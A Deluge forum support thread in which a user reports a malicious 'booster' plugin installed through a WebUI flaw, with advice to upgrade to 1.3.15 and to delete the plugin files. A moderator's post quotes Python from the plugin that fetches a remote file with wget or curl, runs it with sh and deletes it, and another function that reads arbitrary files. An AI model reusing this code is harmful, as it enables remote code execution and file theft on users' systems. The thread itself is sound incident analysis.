[WebUI Vulnerability] Malicious plugin "booster" found on my system

General support for problems installing or using Deluge
ggez
New User
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm

[WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by ggez »

Admin Edit: Upgrade to 1.3.15 to fix this vulnerability

I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S

I am running deluge/deluge-web on Raspbian

https://drive.google.com/file/d/0B23kWK ... sp=sharing
Cas
Top Bloke
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Post by Cas »

If your webui is open to the internet it likely is a malicious egg utilising a know security flaw.

Upgrade to 1.3.15 as it has webui security fixes.
Cas
Top Bloke
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Post by Cas »

Also you should report this to debian as a serious security issue
Cas
Top Bloke
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Post by Cas »

It definitely is malicious, it is modified execute plugin code.
Tvich
Member
Member
Posts: 33
Joined: Thu Apr 27, 2017 6:36 pm

Re: Malicious plugin "booster" found on my system?

Post by Tvich »

My bad, i misunderstood, thought it was Boost.Python. Don't know why. My bad :(
ggez
New User
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by ggez »

Oh sh!t, didn't expect it to be this bad... any idea what it might have downloaded? are there any paths that I can check?
Cas
Top Bloke
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by Cas »

There is likely no way to know for sure.

For reference this is partial summary of code added to the execute plugin:

Code: Select all

def looking_file(name):
    epath = os.environ.get("PATH", None)
    if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
    for p in epath.split(":"):
        testname = p + "/" + name
        if os.path.exists(testname) and os.access(testname, os.X_OK):
            return testname
    return None

def internal_download(url, to):
    if sys.version_info[0] == 3:
        import urllib.request
        urllib.request.urlretrieve(url, to)
    else:
        import urllib
        urllib.urlretrieve(url, to)
    
def yahoo(URL):
    wget = looking_file("wget")
    curl = looking_file("curl")    
    cmd = None
    if wget:
        cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
    elif curl:
        cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "
    
    tmpfile = tempfile.mkstemp()
    tmpname = tmpfile[1]
    os.fdopen(tmpfile[0]).close()
    
    if cmd:
        try:
            tcmd = cmd % (tmpname, URL)
            Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
        except:
            pass           
    else:
        try:
            if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
                internal_download(URL, tmpname)
        except Exception as err:
            return str(err)

    if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
        try:
            os.chmod(tmpname, 0555)
            Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
            time.sleep(2)
            os.remove(tmpname)
        except Exception as err:
            return str(err)
    return "OK"
    
    def get_file(self, filename):
        if os.path.exists(filename):
            fp = open(filename)
            data = fp.read()
            fp.close()
            return data
        else:
            return "FILE %s not exists" % filename
eb98jdb
New User
New User
Posts: 3
Joined: Sat Jan 20, 2018 10:34 am

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by eb98jdb »

How do you remove this malware?
Shryp
Moderator
Moderator
Posts: 521
Joined: Mon Apr 20, 2015 10:20 pm

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by Shryp »

eb98jdb wrote:How do you remove this malware?
I am not for sure on this as I have never had the issue, but on my system plugins are saved in
/home/[USER NAME]/.config/deluge/plugins
and also
/home/[USER NAME]/.cache/Python-Eggs/

I would shut down deluge and remove them from there as a first step.
Post Reply